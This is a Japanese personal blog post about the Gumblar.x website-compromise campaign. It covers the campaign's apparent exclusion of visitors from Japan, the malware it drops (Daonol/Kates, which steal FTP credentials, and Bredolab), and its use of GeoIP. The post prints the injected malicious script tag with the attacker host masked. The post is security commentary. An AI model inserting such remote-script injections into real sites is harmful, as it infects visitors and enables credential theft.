ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

 ロシアのセキュリティ会社カスペルスキーのブログにて、Gumblar.xの改ざんコードは日本からのアクセスのみ弾いてる、ってな情報をのせてます。
Gumblar: Farewell Japan (Kapsersky Securelist)

 Gumblar.xの改ざんコードは、BODYタグの直前に不正なJavaScriptタグが挿入されるシロモノです。今年は2月の初めに活動を再開して、現在でも攻撃は継続中です。
</head>
<script src=http://*****/****.php ></script><body 〜
 日本も含め世界中のホームページがやられてます。カスペのブログにのってる改ざんサイトの国別ランキングだと、1位アメリカ、2位韓国、3位タイ、4位トルコ、5位日本。
 たとえば、海外ですが下はジョニー・デップ&ティム・バートンによるディズニー映画「アリス・イン・ワンダーランド」の韓国版公式サイト(alice2010. co.kr)。日本のディズニー社の公式サイトは大丈夫です。
イメージ 1

 この改ざんコードで最終的に感染するウイルスは、「Daonol」「Kates」と名付けられてます。主要な挙動は、ホームページの更新に利用するFTPアカウント情報の奪取です。

 ちなみに、有名タレントさんがたくさん所属してる芸能事務所ケイダッシュのホームページが改ざんされるというニュースが先日ありましたが、こっちはGumblar.8080(カスペの呼称は「Pegel」)。最終的に発動するウイルスは「Bredolab」というもので、機能的にはいろんなウイルスをダウンロードしてきて感染させるプログラムです。これにやられると、事実上パソコンが乗っ取られちゃいます。(詳しくはトレンドマイクロ ブログ

 で、Gumblar.xが日本を弾いているというのは自分は薄々気づいていて、今回の情報は「やっぱり」というのが感想です。攻撃活動を再開した2月の始め直後は日本からも問題なくアクセスできていたんですが、数日後には空のデータしか降ってこなくなってました。

 それを証明できるデータもないので、以降のチェックは海外のプロクシ経由で行ってましたが、実際に唯一日本だけ特別扱いしてるんですな。なんでなんでしょ・・・?

 カスペのブログでは「free IP-to-country database」を使って日本を示す”111”を弾いているとのことですが、これは具体的にはMaxMind社の「GeoIP」のことです。

「ウイルス・セキュリティ」書庫の記事一覧

開くトラックバック(1)

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
検索 検索
友だち(5)
  • ★ピサロ★
  • who
  • Cookies
  • Kerupani129
  • 物知りマン
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

ふるさと納税サイト『さとふる』
実質2000円で特産品がお手元に
11/30までキャンペーン実施中!
数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!

その他のキャンペーン

みんなの更新記事